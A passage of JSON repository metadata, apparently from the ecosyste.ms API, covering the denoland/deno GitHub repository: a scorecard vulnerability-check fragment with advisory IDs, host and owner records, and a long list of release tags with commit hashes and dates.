RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd